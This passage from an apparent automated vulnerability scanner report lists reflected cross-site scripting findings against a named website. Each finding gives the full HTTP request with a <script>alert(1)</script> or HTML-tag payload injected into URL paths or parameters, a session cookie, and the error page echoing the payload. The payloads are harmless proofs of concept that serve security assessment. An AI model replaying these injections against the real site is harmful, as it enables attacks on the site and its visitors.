Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/0.gif429c6<script>alert(1)</script>a5270fc251a was not found on this server.</p>
...[SNIP]...

2.769. http://www.resellerbase.com/communication/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eaeec<script>alert(1)</script>ef4ab8d018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/0.gif?eaeec<script>alert(1)</script>ef4ab8d018a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/0.gif?eaeec<script>alert(1)</script>ef4ab8d018a=1 was not found on this server.</p>
...[SNIP]...

2.770. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4029e<script>alert(1)</script>b01d3ebb38c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication4029e<script>alert(1)</script>b01d3ebb38c/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication4029e<script>alert(1)</script>b01d3ebb38c/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.771. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b675<script>alert(1)</script>fcfdea2a9ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes3b675<script>alert(1)</script>fcfdea2a9ef/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes3b675<script>alert(1)</script>fcfdea2a9ef/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.772. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9bb1a<script>alert(1)</script>58de3616c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos9bb1a<script>alert(1)</script>58de3616c9d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos9bb1a<script>alert(1)</script>58de3616c9d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.773. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37037<script>alert(1)</script>a0b6303aca0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images37037<script>alert(1)</script>a0b6303aca0/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images37037<script>alert(1)</script>a0b6303aca0/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.774. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faa82<script>alert(1)</script>af5496e46c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/reviewfaa82<script>alert(1)</script>af5496e46c4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/reviewfaa82<script>alert(1)</script>af5496e46c4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.775. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2a163<script>alert(1)</script>b545a1cbcd2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/search.php2a163<script>alert(1)</script>b545a1cbcd2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php2a163<script>alert(1)</script>b545a1cbcd2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.776. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 208d1<a>1971302d5c4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search208d1<a>1971302d5c4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search208d1<a>1971302d5c4&opt=2 was not found on this server.</p>
...[SNIP]...

2.777. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c3ba2<a>1fae1dfefd4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...c3ba2<a>1fae1dfefd4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...c3ba2<a>1fae1dfefd4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.778. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e690d<script>alert(1)</script>9e3711ac5bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e690d<script>alert(1)</script>9e3711ac5bf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e690d<script>alert(1)</script>9e3711ac5bf=1 was not found on this server.</p>
...[SNIP]...

2.779. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2b0b5<a>1f939491693 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=22b0b5<a>1f939491693 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=22b0b5<a>1f939491693 was not found on this server.</p>
...[SNIP]...

2.780. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4377f<script>alert(1)</script>ec763c2e9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication4377f<script>alert(1)</script>ec763c2e9d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication4377f<script>alert(1)</script>ec763c2e9d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.781. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe8d0<script>alert(1)</script>b217353946b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesfe8d0<script>alert(1)</script>b217353946b/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesfe8d0<script>alert(1)</script>b217353946b/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.782. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e45e0<script>alert(1)</script>cfc1878c9c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmose45e0<script>alert(1)</script>cfc1878c9c7/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmose45e0<script>alert(1)</script>cfc1878c9c7/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.783. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7eb5f<script>alert(1)</script>7590bc05d8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images7eb5f<script>alert(1)</script>7590bc05d8a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images7eb5f<script>alert(1)</script>7590bc05d8a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.784. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12997<script>alert(1)</script>c2c2ff97460 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/search.php12997<script>alert(1)</script>c2c2ff97460?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php12997<script>alert(1)</script>c2c2ff97460?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.785. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 57844<a>814c68a6beb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search57844<a>814c68a6beb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search57844<a>814c68a6beb&opt=2 was not found on this server.</p>
...[SNIP]...

2.786. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c0d06<a>c1501ebd4b2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

